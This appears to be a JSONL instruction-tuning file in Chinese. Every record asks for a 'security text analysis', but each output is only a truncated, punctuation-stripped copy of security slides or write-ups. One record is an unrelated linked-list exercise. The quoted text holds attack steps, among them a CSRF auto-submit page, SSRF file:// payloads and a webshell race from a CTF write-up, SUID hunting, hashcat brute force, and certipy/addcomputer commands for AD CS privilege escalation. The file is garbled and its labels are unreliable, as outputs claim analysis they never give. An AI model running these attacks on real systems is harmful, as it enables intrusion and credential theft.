Techniques for Defenders  Face-Off  Conclusion 7/4/10 14 Classifying Well-Known Examples  Medco  Linux  Borlands InterBase  Wordpress if ( date > April 23, 2005 ) delete all files on all 70 se", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1040-linux-网络嗅探 ## 来自ATT&CK的描述 网络嗅探是指使用系统上的网络接口来监视或捕获通过有线或无线连接发送的信息攻击者可以将网络接口置于混杂模式以通过网络被动地访问传输中的数据或者使用跨接端口来捕获更大量的数据 通过该技术可以捕获的数据包括用户凭证尤其是通过不安全的未加密协议发送的凭证网络嗅探还可以获取到配置细节例如运行服务版本号以及后续横向移动和防御逃避活动所需的其他网络特征例如IP寻址主机名VLAN ID ## 测试案例 tcpdump -c 5 -nnni #{网卡接口} tshark -c 5 -i #{网卡接口} ## 检测日志 linux /var/log/message 值得注意的是Ubuntu下默认不开启message日志需要手动开启 ## 测试复现 ### 场景一 ```bash root@icbc:~# tcpdump -c 5 -nnni ens33 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes 10:37:34.347544 IP 192.168.66.1.60886 > 239.255.255.250.1900: UDP, length 137 10:37:37.355725 IP 192.168.66.1.60886 > 239.255.255.250.1900: UDP, length 137 10:37:40.356238 IP 192.168.66.1.60886 > 239.255.255.250.1900: UDP, length 137 10:37:43.356969 IP 192.168.66.1.60886 > 239.255.255.250.1900: UDP, length 137 10:37:49.808569 IP 192.168.66.148.59150 > 192.168.66.2.53: 15476+ [1au] A? connectivity-check.ubuntu.com. (58) 5 packets captured 5 packets received by filter 0 packets dropped by kernel ``` ### 场景二 ```bash root@icbc:~# tshark -c 5 -i ens33 Running as user \"root\" and group \"root\". This could be dangerous. Capturing on 'ens33' 1 0.000000000 192.168.66.148  192.168.66.2 DNS 100 Standard query 0xe349 A connectivity-check.ubuntu.com OPT 2 0.038532840 Vmware_e8:11:b3  Broadcast ARP 60 Who has 192.168.66.148? Tell 192.168.66.2 3 0.038552195 Vmware_02:d5:c7  Vmware_e8:11:b3 ARP 42 192.168.66.148 is at 00:0c:29:02:d5:c7 4 0.038758293 192.168.66.2  192.168.66.148 DNS 132 Standard query response 0xe349 A connectivity-check.ubuntu.com A 35.224.99.156 A 35.222.85.5 OPT 5 0.039670671 192.168.66.148  35.222.85.5 TCP 74 57812  80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM=1 TSval=136575048 TSecr=0 WS=128 5 packets captured ``` ## 测试留痕 ### 0x1 message日志 Jul 19 10:37:33 icbc kernel: [ 298.396406] device ens33 entered promiscuous mode ### 0x2 message日志 Jul 19 10:47:42 icbc systemd[1]: Started Cleanup of Temporary Directories. Ju", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIPv666 Address of the Beast Chris Grayson @_lavalamp Marc Newlin @marcnewlin CHRIS MARC MY NAME IS ITS THE FUTURE BAYBEEEEEE Where to From Here Capn?  Background  The Scanning Problem  Honeypotting for PSLAAC  Modeling for non-PSLAAC  Being Less Dumb  To The Cloud  Results  IPv666  Conclusion A Bit o Background IPv6 - So Hot Right Now A Tale of Gateways and Set Top Boxes  DEFCON 25  26 CVEs  All in consumer premise equipment (CPE)  Ie: Comcast gateways and set top boxes  IPv6 was a big part  https://github.com/BastilleResearch/CableTap Send-to-TV / Remote Web UI  Gateway web UI accepts remote requests from ISP infrastructure  IPv6 address of target gateway provides remote web UI access via set-top box Seems Kinda Spooky  IPv6 works out of the box without manual configuration  All your devices and networking equipment prefer it  Theres no such thing as private address space (for the most part)  Your IPv4 firewall rules dont apply  ICMPv6 is a critical protocol  Single packets can be relayed to lots and lots of hosts Lets Go Hunting The Problem of Scale  IPv4 32 bit addresses 232 possible addresses 4,294,967,296 addresses  IPv6 128 bit 2128 possible addresses 340,282,366,920,938,463,463,374,607,431,768,211,456 addresses PSLAAC Makes Things Harder  Addresses have host and network bits  Network is site prefix and subnet ID  Host is interface ID  PSLAAC means interface ID is pseudorandom  Even small networks (/96) have 32 bits of randomness Breaking Down the Problem  Modeling for cryptographic entropy is no bueno  Two independent problems instead  Identifying PSLAAC hosts  Identifying non-PSLAAC hosts Honeypotting for PSLAAC Why Honeypotting?  Search space too massive  Instead of finding them, have them find us  Took multiple approaches  DNS Server  SMTP Server  Web Server  Popads! Honey DNS Server  Set up Bind server  Glue records point to IPv6  Zones delegated to IPv4 then IPv6  Post links all over social media  Popads! A Quick Note on PopAds Honey Web Server  Set up b", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 八跨站请求伪造 > 作者Peter Yaworski > 译者[飞龙](https://github.com/) > 协议[CC BY-NC-SA 4.0](http://creativecommons.org/licenses/by-nc-sa/4.0/) ## 描述 跨站请求伪造或 CSRF 攻击在恶意网站电子邮件即使消息应用以及其它使用户的 Web 浏览器执行其它站点上的一些操作并且用户已经授权或登录了该站点时发生这通常会在用户不知道操作已经执行的情况下发生 CSRF 攻击的影响取决于收到操作的站点这里是一个例子 1. Bob 登录了它的银行账户执行了一些操作但是没有登出 2. Bob 检查了它的邮箱并点击了一个陌生站点的链接 3. 陌生站点向 Bob 银行站点发送请求来进行转账并传递第一步中保存 Bob 银行会话的 Cookie 信息 4. Bob 的银行站点收到了来自陌生恶意站点的请求没有使用 CSRF Token 的情况下处理了转账 更有意思的是这个想法也就是恶意网站的链接可以包含有效的 HTML`<imgsrc=www.malicious_site.com>`并且并不需要 Bob 点击链接如果 Bob 的设备例如浏览器渲染了这个图片它会向`malicious_site.com`发送请求来完成 CSRF 攻击 现在知道了 CSRF 的危险之后它们可以以多种方式防范最流行的方式大概是 CSRF Token它必须随着潜在的数据修改气你去一起提交例如 POST 请求这里Web 应用例如 Bob 的银行会生成一个两部分的 Token一个 Bob 会收到另一个由应用保管 当 Bob 试图提交转账请求时它就需要提交 Token银行会验证它这一边的 Token 现在对于 CSRF 和 CSRF Token 来说跨域资源共享似乎越来越普遍了或者只是我注意到是这样本质上CORS 限制了资源包括 JSON 响应被外域访问换句话说当 CORS 用于保护站点时你就不能编写 JavaScript 来调用目标应用读取响应或者进行另一个调用除非目标站点允许 似乎这非常令人混乱使用 JavaScript尝试调用` HackerOne.com/activity.json`读取响应并进行二次调用你也会在下面的例子 #3 看到它的重要性以及潜在的原理 最后重要的是要记住感谢 Jobert Abma 补充并不是每个不带有 CSRF Token 的请求都带有 CSRF 问题一些站点可能执行额外的检查例如比较 Referer 协议头虽然可能出错并且有一些绕过它的案例它是一个字段标识了链接到被请求资源的页面地址换句话说如果 POST 调用中的 Referer 并不来源于收到 HTTP 请求的相同站点站点可能不允许该调用因此能够完成和验证 CSRF Token 的相同操作此外不是每个站点在创建或者定义 Token 时都使用`csrf`术语例如在 Badoo 它使用`rt`参数我们下面会讨论 > 链接 > 查看 [OWASP 测试指南](https://www.owasp.org/index.php/Testing_for_CSRF_%28OTG-SESS-005%29) ## 示例 ### 1\\. Shopify 导出已安装的用户 难度低 URL`https://app.shopify.com/services/partners/api_clients/XXXX/export_installed_users` 报告链接`https://hackerone.com/reports/96470` 报告日期2015.10.29 奖金$500 描述 Shopify 的 API 提供了一个终端用于导出已安装用户的列表通过上面给出的 URL在站点能够调用该终端并且读取信息的地方存在漏洞因为 Shopify 在该调用中并没有包含任何 CSRF Token 验证所以下面的 HTML 代码可以用于代表任何未知受害者提交表单 ```html <html> <head><title>csrf</title></head> <body onLoad=\"document.forms[0].submit()\"> <form action=\"https://app.shopify.com/services/partners/api_clients/1105664/\\ export_installed_users\" method=\"GET\"> </form> </body> </html> ``` 这里通过仅仅浏览站点JavaScript 就会提交表单它实际上包含 Shopify API 的 GET 请求使用受害者的浏览器并提供 Shopify 的 Cookie > 重要结论 > 扩展你的", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJailbreaking the 3DS @smealum( Intro to 3DS Old(3DS(line Whats a 3DS? New(3DS(line 3DS(XL 2DS New(3DS(XL 3DS New(2DS(XL New(3DS  Out(starting(2014(  CPU:(4x(ARM11(MPCore((804MHz)(  GPU:(DMP(PICA(  RAM:(256MB(FCRAM,(6MB(VRAM(  IO/Security(CPU:(ARM946(  Hardware-based(backwards( compatible(with(DS(games(  Fully(custom(microkernel-based(OS(  Out(starting(2011(  CPU:(2x(ARM11(MPCore((268MHz)(  GPU:(DMP(PICA(  RAM:(128MB(FCRAM,(6MB(VRAM(  IO/Security(CPU:(ARM946(  Hardware-based(backwards( compatible(with(DS(games(  Fully(custom(microkernel-based(OS( Memory CPUs Devices ARM9( ARM11( FCRAM( WRAM( VRAM( ARM9( internal( GPU( CRYPTO( NAND( 3DS hardware overview Runs(games,(apps,(menus((everything(you(can(see(and(play(with( Brokers(access(to(storage,(performs(crypto(tasks((decryption,(authentication)( Memory CPUs Devices ARM9( ARM11( FCRAM( WRAM( VRAM( ARM9( internal( GPU( CRYPTO( NAND( ARM9: access to almost everything Memory CPUs Devices ARM9( ARM11( FCRAM( WRAM( VRAM( ARM9( internal( GPU( CRYPTO( NAND( ARM11: more limited access to hardware ARM11 Kernel Home Menu NS fs GSP HID System calls APPLICATION memory region SYSTEM memory region BASE memory region Game The ARM11s microkernel architecture ARM11 Kernel Home Menu NS fs GSP HID System calls APPLICATION memory region SYSTEM memory region BASE memory region Game The ARM11s microkernel architecture: system call access control ARM11 Kernel Home Menu NS fs GSP HID System calls APPLICATION memory region SYSTEM memory region BASE memory region Game The ARM11s microkernel architecture: system call access control ARM11 Kernel Home Menu NS fs GSP HID System calls APPLICATION memory region SYSTEM memory region BASE memory region Game The ARM11s microkernel architecture: system call access control ARM11 Kernel Home Menu NS fs GSP HID System calls APPLICATION memory region SYSTEM memory region BASE memory region Game The ARM11s microkernel architecture: services gsp::Gpu( fs:USER( hid:USER( fs:USER( gsp::Gpu( hid:USER( ARM11 Kernel ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n~ Jay Turla @shipcod3 CAR INFOTAINMENT HACKING METHODOLOGY AND ATTACK SURFACE SCENARIOS WHOAMI  Jay Turla @shipcod3  app security engineer @Bugcrowd  ROOTCON goon  contributed to some security tools  I love PS4  Not the creator of Turla malware  Loves to party BEFORE ANYTHING ELSE.. WE NEED AN INSPIRATIONAL QUOTE SCOPE & LIMITATIONS  Infotainment bugs and its attack surfaces  No Canbus Hacking  Methodologies, Security Bugs But Not Full Takeover of the Car (because infotainments have limitation)  Kinda similar to Jason Haddixs The Bug Hunters Methodology (in fact inspired by it)  Probably miss out some attack surfaces (only common ones with known vulnerabilities or proof of concept) COMMON ATTACK SURFACES BY CRAIG SMITH IN HIS BOOK THE CAR HACKERS HANDBOOK COMMON ATTACK SURFACES LINKED TO THE INFOTAINMENT CONSOLE  Bluetooth  Wi-Fi  USB Ports  SD Card Ports  CD-ROM / DVD-ROM  Touch screen and other inputs that allow you to control the console  Audio Jack (hmmm maybe?)  Cellular Connection, GPS, etc. BLUETOOTH  Bluetooth vulnerabilities  Bluetooth jamming  Code execution (havent seen a PoC on an infotainment yet)  Default bluetooth pairing numbers: 0000,\" 1111, 1234\"  Malformed or Format String Vulnerabilities (Brick the Device)  Memory corruption - send malformed packages to the head unit BLUETOOTH CASE - FORMAT STRING VULNERABILITIES THAT COULD LEAD TO APPLICATION CRASH OR BRICKING OF YOUR DEVICE  Some Bluetooth stacks on infotainment systems can be crashed via %x or %c format string specifiers in a device name, address book name, song title, etc.  CVE-2017-9212 was assigned to a BMW 330i 2011 car wherein a researcher from IOActive renamed his device with format string specifiers & connected his device via Bluetooth to his car which eventually crashed his system.  Warning! Bricks your system so test at your own risk  WHAT IF it takes you to the desktop environment or debug options? HERE ARE SOME PAYLOADS YOU CAN TRY WI-FI  Wi-Fi deauthentication attacks  Does the fir", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nREVIEW THE POST AT: HTTPS://DEFCONGROUPS.ORG/DCGSTART.HTML   IT'S BASED ON LOCAL PHONE CODES FROM  YOU CANNOT BE DC042 OR DC666 OR DC11010100011   BASED ON DIALING CODES AND AREA CODE *FROM THE USA*  E.G. EDMONTON, CANADA = DC780 BECAUSE OF NORTH AMERICA, BILDA, ALGERIA = DC11213 (21 IS COUNTRY CODE, 3 IS CITY CODE)   THE DESIGNATION IS DC###-A, -B, ETC.   (JUST LIKE COCA-COLA, FORD, ETC  THEY DO NOT LET YOU USE THEIR LOGO)      (THANK YOU FOR YOUR PATIENCE!)   (RE: AUTOREPLY LOOPS)   PLAIN TEXT ONLY!  NOT PDF, DOCX, ETC.  IMAGE FILES ARE THE EXCEPTION (FOR LOGOS, OTHER PHOTOS)   Q&A WITH THE DCG CORE TEAM   SHARE IDEAS WITH OTHER GROUPS  PROJECTS, MEETING SPACES, HOW DO YOU MARKET YOUR GROUP?  MEET OTHER DCGS!", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 内存取证 在HW排查发现可疑进程 python 使find命令进全盘搜索并没有发现相关件\" python \"应该是运在内存之中,但是我 们没有原件我们如何进分析 使 cat /proc/pid/maps 命令查看件在内存之中的情况可以看到件被删除之前存 在与路径: /tmp/.ICE-unix/python 发现 /tmp/.ICE-unix/python 有nohup件查看nohup.out件并没有发现什么线索 现在没有原件只有个进程我们可以通过使gdb把内存dump出来进分析 然后就是gdb命令(我也不知道该dump多少dump块内存) Bash 复制代码 gdb attach 14775 1 2 使IDA发现所谓的 python 件是个frp代理程序 寻找解密函数 使gdb分析在内存中成功还原攻击者IP Bash 复制代码 dump memory /root/memory.dump 0xc84da000 0xc8941000 1", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPASSIVE BLUETOOH MONITORING IN SCAPY Ryan Holeman AGENDA  bluetooth essentials  fundamental projects  scapy-btbb project overview  demo ESSENTIAL BLUETOOTH  bluetooth is a frequency hopping protocol ESSENTIAL BLUETOOTH  BTBB - bluetooth baseband  air traffic between master and slave bluetooth devices ESSENTIAL BLUETOOTH  nap  non-significant for communication  vendor association  uap  upper address part  vendor association  calculated from btbb packets  lap  lower address part  easily obtained in btbb packet FUNDAMENTAL PROJECTS SCAPY  Philippe Biondi  python network analysis and manipulation tool  supports many protocols and layers  Ethernet, Tcp/Ip, 802.11, 802.15.5, etc FUNDAMENTAL PROJECTS LIBBTBB  Dominic Spill and Mike Ossmann  provides methods for:  uap discovery, clock discovery, etc  wireshark plugin  wireshark btbb support FUNDAMENTAL PROJECTS UBERTOOTH  bluetooth baseband sniffer  Mike Ossmann  kismet plugin SCAPY-BTBB GOALS  bluetooth baseband traffic in python SCAPY-BTBB CONTRIBUTIONS  btbb layer in scapy  a stream utility for pcap files in scapy  btbb helper methods  vendor from nap/uap  distinct address lists from btbb traffic  extensive documentation of related projects SCAPY-BTBB RELEVANCE  real time and postmortem data analysis for btbb traffic  compatibility across hardware  though pcap files  easily incorporated into:  developer debugging tools  auditing tools  exploitation tools DEMO REFERENCES  scapy  Phillippe Biondi  secdev.org/projects/scapy  libbtbb  Dominic Spill & Mike Ossmann  sourceforge.net/projects/libbtbb  ubertooth  Mike Ossmann  ubertooth.sourceforge.net  kismet  Mike Kershaw  kismetwireless.net  bluez  bluez.org  pybluez  pybluez.googlecode.com  wireshark  wireshark.org  ipython  ipython.org  pandas  pandas.pydata.org PROJECT HOME AND CONTACT INFO  project home  hackgnar.com/projects/btbb  contact  email: ripper@hackgnar.com  twitter: @hackgnar", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKernel Exploitation Via Uninitialized Stack Kees Cook kees.cook@canonical.com www.canonical.com August 2011 2 Kernel Exploitation Via Uninitialized Stack by Kees Cook 20 Minutes!  introduction  quick Linux kernel exploitation basics  audit callers of copy_from_user() for mistakes  found a flawed function, but you don't have direct control?  controlling an uninitialized stack variable  become root  questions 3 Kernel Exploitation Via Uninitialized Stack by Kees Cook introduction 4 Kernel Exploitation Via Uninitialized Stack by Kees Cook who I am, what I do Kees Cook  Pronounced Case  @kees_cook on Twitter DefCon Capture the Flag  Started participating in 2003  With Team 1@stPlace, won in 2006 and 2007  Still play in the qualification rounds just for the fun of it Ubuntu Security Team  Started working for Canonical in 2006  Responsible for keeping Ubuntu as safe as possible  Enjoyed getting compiler hardening into shape  Now focusing on kernel hardening 5 Kernel Exploitation Via Uninitialized Stack by Kees Cook quick Linux kernel exploitation basics 6 Kernel Exploitation Via Uninitialized Stack by Kees Cook key to kernel exploitation is the arbitrary write Control kernel memory  Kernel determines permissions Credentials  Change your process's UID to 0 Tricky bit is finding the targets  Hunt through kernel memory  Global functions, variables 7 Kernel Exploitation Via Uninitialized Stack by Kees Cook there is an extensive list of potential targets and triggers Function tables!  struct security_operations global pointer: security_ops include/linux/security.h easy offset to ptrace_access_check, but requires a little clean-up  System-wide IDT Attacking the Core: http://www.phrack.org/issues.html?issue=64&id=6 requires handling interrupt mode  single, isolated struct sock sk_destruct called on close() easy to find in memory via /proc/net/tcp 8 Kernel Exploitation Via Uninitialized Stack by Kees Cook but you need the find a flaw first Everything is a theory until you find a ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n$ S T A N D A R D _ I N F O R M A T I O N $ F I L E N A M E Windows取证分析 海 报 你不能保护你不知道的东西 digital-forensics.sans.org DFPS_FOR500_v4.9_4-19 Poster Created by Rob Lee with support of the SANS DFIR Faculty 2019 Rob Lee. All Rights Reserved. 翻译Leon(liyi05@qianxin.com) 文件重命名 本地文件移动 卷文件移动 通过命令行 卷文件移动 通过文件 管理器复制/粘贴) 文件复制 只有Win7以后的 NTFS不改变 文件访问 文件修改 访问时间-文件 创建时间 文件创建 文件删除 Windows 痕迹分析: ...的证据 UserAssist 描述 Windows系统从桌面启动的GUI程序在启动器中进行跟踪 位置 NTUSER.DAT HIVE: NTUSER.DAT\\Software\\Microsoft\\Windows\\Currentversion\\Explorer\\UserAssist\\ {GUID}\\Count 解释 所有的值是 ROT-13编码  GUID for XP - 75048700 活动桌面  GUID for Win7/8/10 - CEBFF5CD 可执行文件执行 - F4E57C4B 快捷方式文件执行 Windows 10 时间线 描述 Win10在时间线中记录最近使用的应用程序和文件可 以通过WIN + TAB键访问 数据记录在一个SQLite数据 库中 位置 C:\\Users\\<profile>\\AppData\\Local\\ConnectedDevices Platform\\L.<profile>\\ActivitiesCache.db 解释  应用程序执行  每个应用程序的焦点数 RecentApps 描述 在Win10系统上启动的GUI程序执行可在 RecentApps键中 进行跟踪 位置 Win10: NTUSER.DAT\\Software\\Microsoft\\Windows\\Current Version\\Search \\RecentApps 解释 每个GUID键指向一个最近使用的应用程序 AppID = 应用程序名称 LastAccessTime = UTC格式的最后执行时间 LaunchCount = 执行过的次数 Shimcache 描述  Windows使用Windows应用程序兼容性数据库来确定可执行文 件可能出现的应用程序兼容性挑战  跟踪可执行文件的文件名文件大小上次修改时间以及 Windows XP中的上次更新时间 位置 XP: SYSTEM\\CurrentControlSet\\Control\\SessionManager\\AppCompatibility Win7/8/10: SYSTEM\\CurrentControlSet\\Control\\Session Manager\\AppCompatCache 解释 在此注册表项中可以找到Windows系统上运行的任何可执行文 件 您可以使用此键来识别系统执行了特定恶意软件另外 基于对时间数据的解释您也许能够确定系统上执行或活动的 最后时间  Windows XP包含最多96项 - 执行文件时更新LastUpdateTime  Windows 7包含最多1,024项 - Win7系统上不存在LastUpdateTime 跳转列表 描述  Windows 7任务栏跳转列表经过精心设计可让用户快 速轻松地跳转或访问他们经常或最近使用的项目此功 能不仅可以包括最近的媒体文件 它还包括最近的任务  每个存储在AutomaticDestinations文件夹中的数据具有一个 唯一的文件该文件前面带有关联应用程序的AppID 位置 Win7/8/10: C:\\%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Recent \\ AutomaticDestinations 解释  应用程序首次运行时间 - Creation Time = 添加到AppID文件的第一个时间项  Last time of execution of application w/file open. - Modification Time = 添加到AppID文件的最后一条时间项  Jump List ID列表 -> http://www.forensicswiki.org/wiki/List_of_Jump_List_IDs Amcache.hve 描述 ProgramDataUpdat", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefCon 13 Shmoo-Fu: Hacker Goo, Goofs, and Gear with the Shmoo The Shmoo Group www.shmoo.com DefCon 13 What's up Shmoo?  Howdy & introductions...  Our festivities will include:  IDN Fallout & Homograph Attacks for Personal Identities  Super Spy Stuff  Revving Up Rainbow Tables  Rogue Squadron & EAP Peeking  Shooting Your Security Wad  Don't Try This at Home  And MORE! DefCon 13 Stickers anyone? DefCon 13 IDN Fallout  At ShmooCon 2005, Eric Johansen dropped the browser bomb regarding IDN issues.  The press ran with it a bit.  The folks responsible for IDN ranted for a bit.  But did anything concrete occur?  And where are we now? DefCon 13 1337 Personal Identities  So Ericj is now 3ricj, BTW.  Oh snap. That rhymes.  Where does the system break down when your name doesn't quite conform?  Does 3ricj get more fan mail?  Can the man keep your 1337 identity down? DefCon 13 And now... Pablos. DefCon 13 Super Spy Stuff  Robots got boring, so Pablos starting hanging out with models after his chic hacker photo shoot in FHM.  The result was nothing short of spectacular, as the fashionable cell-phone stowaway strifes hot women face were finally addressed. DefCon 13 While Pablos discusses the alien technology inner workings of his secret ninja lair, you can stare at this... DefCon 13 DefCon 13 Dan Moniz goes crazy... DefCon 13 rainbowtables.shmoo.com  We think rainbow tables are neat.  Just for fun, we started hosting rainbow tables that we had generated.  LanMan  Via Bittorrent  FREE  Some people liked that. Yay!  Some people didn't... DefCon 13 ---------- Forwarded message ---------- From: Zhu Shuanglei <shuanglei@hotmail.com> Date: Mar 10, 2005 12:42 AM Subject: About your shmoo site To: beetle@shmoo.com Hi, I am Zhu Shuanglei, the author of RainbowCrack software. I notice you are offering free BitTorrent links on your website for the rainbow tables. For those guys selling the table without permission from me, they are not welcome. But you are worse. As you may know, I develop", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 上午 ## web ### URL 页面输入存在url参数 ?url=怀疑是SSRF读取源码 ``` /index.php?url=file://localhost/ctf.cybersec/../../var/www/html/index.php&submit=SUBMIT ``` ```php <?php function curl($url){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); } if(isset($_GET['submit'])){ $url = $_GET['url']; if (preg_match('/ctf\\.cybersec/i', $url)) { if (preg_match('/\\@|\\#|\\?/i', $url)) { die('not @#?'); } else { $parts = parse_url($url); if (empty($parts['host']) || $parts['host'] != 'localhost') { exit('host must be localhost'); } else { curl($url); } } } else { die(\"The URL must contain the 'ctf.cybersec'\"); } } ?> ``` 源码里不存在flag和提示经过尝试找到flag在/flag.txt ``` /index.php?url=file://localhost/ctf.cybersec/../flag.txt&submit=SUBMIT ``` --- ### upload 文件上传提示200OK,但访问又是404,解法是条件竞争,burp开两个intruder窗口一个持续上传一个持续访问预期文件名线程调高即可 上传生成马 ```php <?php file_put_contents(\"shell123.php\",\"test888888<?php phpinfo();?>\");?> ``` 这题给了flag位置在/root/flag直接读是没有权限的需要执行/etc/下的test才能读取flag类似于大型竞赛的readflag程序为了防止破坏flag 这类readflag程序一般是通过SUID实现的以下命令将尝试查找具有root权限的SUID的文件不同系统适用于不同的命令一个一个试 ``` find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000-print2>/dev/null find / -user root -perm -4000-exec ls -ldb {} \\; ``` --- # 下午 ## Misc ### 签到 flag 就在图片里面 --- ### RE_bitsconvert **描述** 与门或门和非门是常见的门电路现有一个电路其中一部分有与或非三个门有一串电流序列以一定的顺序通过了这个电路现获取到电流通过这三个门之后的状态那么原电流的序列是什么 提示md5(flag) == 4c753d89d239bb17b8d754ff981c7772 程序运行后要求输入 01,在输入到第32次后会判断答案,那么可以得出揭露 01组成的32位数 md5 == 4c753d89d239bb17b8d754ff981c7772 用 hashcat 爆破 ``` hashcat.exe 4c753d89d239bb17b8d754ff981c7772 -a 3 -m 0 -3 01 ?3?3?3?3?3?3?3?3?3?3?3?3?3?3?3?3?3?3?3?3?3?3?3?3?3?3?3?3?3?3?3?3 ``` 将 10011011101110000010111100001101 输入至程序得到 flag flag{10011011-10111000-00101111-00001101} --- ### 被加密了的设备驱动 附件是一个加密的压缩包,爆破密码,是弱口令 05114568 解压出来是一个文本文件和一个加密的压缩包 ppp内容如下 ``` 1 0 LOAD_CONST 0 (0) 2 LOAD_CONST 1 (None) 4 IMPORT_NAME 0 (hashlib) 6 STORE_NAME 0 (hashlib) 3 8 LOAD_CONST 2 (<code object encode at 0x03543", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 18.2 删除链表中重复的结点 [牛客网](https://www.nowcoder.com/practice/fc533c45b73a41b0b44ccba763f866ef?tpId=13&tqId=11209&tPage=1&rp=1&ru=/ta/coding-interviews&qru=/ta/coding-interviews/question-ranking&from=cyc_github) ## 题目描述 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/17e301df-52e8-4886-b593-841a16d13e44.png\" width=\"450\"/> </div><br> ## 解题描述 ```java public ListNode deleteDuplication(ListNode pHead) { if (pHead == null || pHead.next == null) return pHead; ListNode next = pHead.next; if (pHead.val == next.val) { while (next != null && pHead.val == next.val) next = next.next; return deleteDuplication(next); } else { pHead.next = deleteDuplication(pHead.next); return pHead; } } ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSneak into buildings with KNXnet/IP using BOF whoami Claire Vacherot Senior pentester @ Orange Cyberdefense France Random info: Writing tools (and then discover they already exist) Part of GreHacks organization team Penetration testing on \"unusual\" environments 2 PROGRAMMING SECURE PROGRAMMING  ON EMBEDDED/ICS DEVICES EMBEDDED/ICS DEVICE SECURITY ICS SECURITY Best conference (after Defcon) Disclaimer Please be careful  Testing industrial systems is dangerous Control of physical processes Impact on peoples safety Accidents Disabling safety controls Test in controlled environments 3 BMS KNX BOF BMS Building Management/Automation System Components automation & control Home, buildings, factories, hospitals, offices,  5 HVAC Lighting Shutters Elevators Access control Intrusion detection Safety and security BMS 6 * \"Hackers (1995) has a BMS hacking scene  The pool on the roof has a leak.  7 The  field  network 8 Actuator Sensor Controller Field bus The  IP  network 9 IP server IP gateway IP interface Operator Maintainer Anyone else Remote control! Why should we take a look? Exposing  industrial  protocols and devices Legacy software and protocols Not designed to handle cybersecurity issues Not operated with cybersecurity in mind 10 The  interface  device 11 but reachable from the LAN Usually in electric cabinets Lets scan it! 12 21/tcp ftp 22/tcp ssh 23/tcp telnet 80/tcp http 443/tcp https 3671/udp knxnet 47808/udp bacnet BMS link Admin Why should we take a look? 13 Regular IP services BMS protocol service BMS security wrap up 14 Me Unknown protocol = new attack surface Entry point Target BMS security wrap up What can we do with that? #1 Send valid stuff #2 Send invalid stuff 15 Attack scenario #1 Change BMS behavior Enable sprinklers Disable fire detection Change thresholds Turn everything off  16 Me Legitimate command Attack scenario #1 Change BMS behavior Example Listen to the traffic Replaying BACnet frames Turning off that HVAC 17 s = socket.socket(socket.AF_INET, so", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2022/5/16 05:03 Evernote Export file:///C:/Users/jiushi/Desktop/Active Directory 域权限提升漏洞(CVE-2022-26963)漏洞复现.html 1/7 漏洞原理: 默认情况下用户模板不易受到攻击当我们根据用户模板请求证书时用户帐户的用户主体名称 (UPN) 将嵌入可用于识别的 SAN 中由于 UPN 必须是唯一的而且我们通常无 法修改 UPN因此我们无法利用此模板此外由于我们无法更改证书签名请求中的 SAN 值因此我们无法通过指定其 UPN 来模拟其他用户 但是计算机帐户没有 UPN机器模板不使用 UPN 进行身份验证而是使用机器的 DNS 名称进行识别和身份验证当通过机器模板为机器请求证书时AD CS 将机器的 DNS 名 称嵌入到 SAN 中然后用于身份验证 利用条件: 拥有一个普通的域用户权限 目标安装了AD CS 利用过程: 1. 添加机器账户 2. 删除机器账户的SPN信息(ServicePrincipalName)[不清楚ServicePrincipalName无法修改DNSHostName]修改机器账户的DNSHostName 3. 用机器账户去申请证书并获取Ntlm 4. DCSYNC 环境: 利用https://tryhackme.com/ 在线靶场连入openvpn进行利用 Domain:lunar.eruca.com DC:lundc.lunar.eruca.com CA Name:LUNAR-LUNDC-CA Domain User:thm pwd:Password1@ 准备工具 certipy impacket 需要将目标域域控CA服务器主机名加入hosts 这里如果你的CA服务器主机名没写对会有问题后面会说到 首先要获取CA的服务器主机名 certutil -config - -ping 利用certipy用域用户去申请签名会返回用户的pfx certipy req 'lunar.eruca.com/thm:Password1@@lundc.eruca.com' -ca LUNAR-LUNDC-CA -template User 2022/5/16 05:03 Evernote Export file:///C:/Users/jiushi/Desktop/Active Directory 域权限提升漏洞(CVE-2022-26963)漏洞复现.html 2/7 利用certipy auth可以获取对应用户的ntlm certipy auth -pfx thm.pfx 可以使用用户的ntlm去getTGT获取凭证...(未复现待补充) 利用addcomputer.py添加机器账户 addcomputer.py 'lunar.eruca.com/thm:Password1@' -method LDAPS -computer-name 'THMPC' -computer-pass 